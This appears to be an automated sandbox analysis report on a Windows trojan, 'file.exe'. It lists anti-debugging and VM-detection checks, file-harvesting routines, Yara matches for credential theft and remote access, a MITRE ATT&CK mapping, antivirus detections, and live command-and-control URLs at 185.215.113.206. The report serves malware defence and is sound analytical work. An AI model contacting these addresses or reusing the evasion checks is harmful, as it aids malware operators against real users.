              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C930E second address: 8C9314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C9314 second address: 8C9325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FBF65561B46h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C9325 second address: 8C9349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FBF651345A8h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C9349 second address: 8C934D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C934D second address: 8C935D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FBF65134596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C935D second address: 8C9363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C9363 second address: 8C9367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CACFD second address: 8CAD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CAD06 second address: 8CAD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CAD0C second address: 8CAD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C202C3 second address: 4C202FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF6513459Fh 0x00000008 jmp 00007FBF651345A8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 mov dh, 9Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 mov eax, 73B6EB5Fh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C202FB second address: 4C20323 instructions: 0x00000000 rdtsc 0x00000002 mov dh, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FBF65561B57h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx edi, si 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C20323 second address: 4C20336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF6513459Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C20336 second address: 4C2033A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C203A1 second address: 4C203A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C203A7 second address: 4C203AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C203AB second address: 4C203EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF6513459Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBF6513459Ch 0x00000013 or esi, 5B080FA8h 0x00000019 jmp 00007FBF6513459Bh 0x0000001e popfd 0x0000001f push esi 0x00000020 mov cx, di 0x00000023 pop ebx 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov edi, ecx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 62FA44 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7DAA67 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 62D55E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7EBD7A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exe Evaded block: after key decision graph_0-27019
              Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTime,DecisionNodes graph_0-25837
              Source: C:\Users\user\Desktop\file.exe API coverage: 4.8 %
              Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003F18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003F18A0
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003F3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003F3910
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003FE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003FE210
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003F1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003F1269
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003F1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003F1250
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003F4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003F4B29
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003F4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003F4B10
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003F23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003F23A9
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003EDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003EDB99
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003F2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_003F2390
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003EDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003EDB80
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003FCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003FCBE0
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003FDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_003FDD30
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003FD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003FD530
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003E16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003E16B9
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003E16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003E16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00401BF0
              Source: file.exe, file.exe, 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2236827089.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25824
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25832
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25676
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25696
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E4A60 VirtualProtect 00000000,00000004,00000100,?,0_2_003E4A60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00406390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406390 mov eax, dword ptr fs:[00000030h],0_2_00406390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00402A40
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 404, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00404610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004046A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_004046A0
Source: file.exe, file.exe, 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00402D60
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00402B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00402A40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00402C10

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2186915935.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 404, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2186915935.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 404, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix, listed per tactic (the number shown beside a technique in the report's matrix is kept in parentheses):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Command and Scripting Interpreter (2), Native API (13), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: Create Account (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Source | Detection | Scanner | Label
file.exe | 42% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.206/405117-2476756634-1003u | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpJA | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpoIHH | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.php5IfH | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpfA | 100% | Avira URL Cloud | malware
http://185.215.113.206/YIzH | 100% | Avira URL Cloud | malware
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/ | false | | high
http://185.215.113.206/c4becf79229cb002.php | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.phpJA | file.exe, 00000000.00000002.2236827089.00000000011FC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206// | file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpoIHH | file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.phpfA | file.exe, 00000000.00000002.2236827089.00000000011FC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/405117-2476756634-1003u | file.exe, 00000000.00000002.2236827089.00000000011D2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
